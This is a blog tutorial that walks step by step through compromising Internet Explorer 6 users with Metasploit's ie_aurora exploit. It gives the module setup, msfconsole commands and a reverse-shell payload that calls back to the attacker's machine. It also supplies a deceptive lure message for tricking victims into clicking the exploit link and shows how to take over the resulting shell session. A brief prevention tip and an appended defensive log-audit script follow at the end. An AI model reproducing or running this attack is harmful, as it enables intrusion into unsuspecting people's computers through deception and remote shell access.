Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb


Type : Tutorial

Level : Medium, Advanced

If you want to learn the easy way, you can see my tutorial about using this exploit through a web-based interface here.

This year will end in a few weeks. I still remember that in the 2nd week of January this year, Metasploit announced the new exploit for Internet Explorer 6 called ie_aurora memory corruption. Now that I live here in China, there are a lot of people still using Internet Explorer 6. I don't know why; maybe, in my opinion, all of the programmers here are very Windows-minded. Yeah, but that's not my problem, I just want to share the tutorial "Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb".

Tools Needed :

1. Backtrack Linux

2. ie_aurora.rb  (Download From Mediafire.com)


Step By Step Exploiting Internet Explorer 6 to Gain Administrator Privilege Using ie_aurora.rb:

1. Download ie_aurora.rb, then copy it to /pentest/exploits/framework3/modules/exploits/windows/browser/, or simply run this command after you download it to your Backtrack desktop:

cp ie_aurora.rb /pentest/exploits/framework3/modules/exploits/windows/browser/

2. Run your Metasploit console: /pentest/exploits/framework3/msfconsole


3. Use the ie_aurora exploit and then set your PAYLOAD (I'm using shell_reverse_tcp)

use exploit/windows/browser/ie_aurora

set payload windows/shell_reverse_tcp


4. Next, you must set the standard options for this exploit.

set RHOST 192.168.1.2

Define your target IP address (optional).

set SRVPORT 80

The listening port number in the target computer (usually a web application on port 80).

set URIPATH ProofOfConcept

This is what our link will look like (example: http://www.google.com/ProofOfConcept).

set LHOST 192.168.1.8

We must specify the address of our computer.


5. When we've finished setting up all of the requirements, just run the exploit command.


6. Okay, we've finished: the exploit generates the new URL and it's already listening on local port 80. The next step is sending the URL to the target and making them click the link we've given them.

Hi fellas, you want to see the great animations picture in your browser? Just follow this link http://192.168.1.8/ProofOfConcept

Below is the picture when the victim clicks the link.


7. The browser will start to load but never complete, which means that the exploit has already worked. We can also see on our Backtrack box that someone has been trapped.


8. There's a new session created, so we can use it. To list the active sessions, run the sessions -l command. To interact with the session, just look at the session ID on the left side, then run sessions -i 1.


And now we're already inside the victim computer's console. 🙂

Prevention :

1. Update your browser regularly. This exploit cannot work in Internet Explorer 7 or newer.
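To act on this advice, the following added example (not part of the original post) scans proxy logs for clients that still report Internet Explorer 6 and flags those that fetched a URL whose host is a bare IP address, like the link in step 6. The log layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumed proxy log layout and sample lines, both constructed for this example:
#   <client_ip> <METHOD> <url> <status> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
MSIE_RE = re.compile(r"\bMSIE (\d+)\.")

SAMPLE_LOG = """\
10.0.0.21 GET http://192.168.1.8/ProofOfConcept 200 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10.0.0.22 GET http://intranet.example/home 200 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.23 GET http://192.168.1.8/ProofOfConcept 200 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
10.0.0.24 GET http://news.example/ 200 "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6"
this line is malformed
"""

def msie_major(user_agent):
    """Major IE version from the (client-supplied, spoofable) User-Agent."""
    m = MSIE_RE.search(user_agent)
    return int(m.group(1)) if m else None

def host_is_ip_literal(url):
    """True when the URL's host is a bare IPv4/IPv6 address, not a name."""
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False

def audit(lines):
    """Return (clients_to_upgrade, ip_link_alerts, skipped_line_count)."""
    upgrade, alerts, skipped = set(), [], 0
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            skipped += 1  # count unparseable lines instead of hiding them
            continue
        client, _method, url, _status, ua = m.groups()
        ver = msie_major(ua)
        # The post states the exploit does not work on IE 7 or newer.
        if ver is not None and ver < 7:
            upgrade.add(client)
            if host_is_ip_literal(url):
                alerts.append((client, url))
    return sorted(upgrade), alerts, skipped

if __name__ == "__main__":
    print(audit(SAMPLE_LOG.splitlines()))
```

Because the User-Agent header is set by the client, treat the upgrade list as a starting inventory and confirm browser versions on the hosts themselves.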


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Visit Website: http://www.vishnuvalentino.com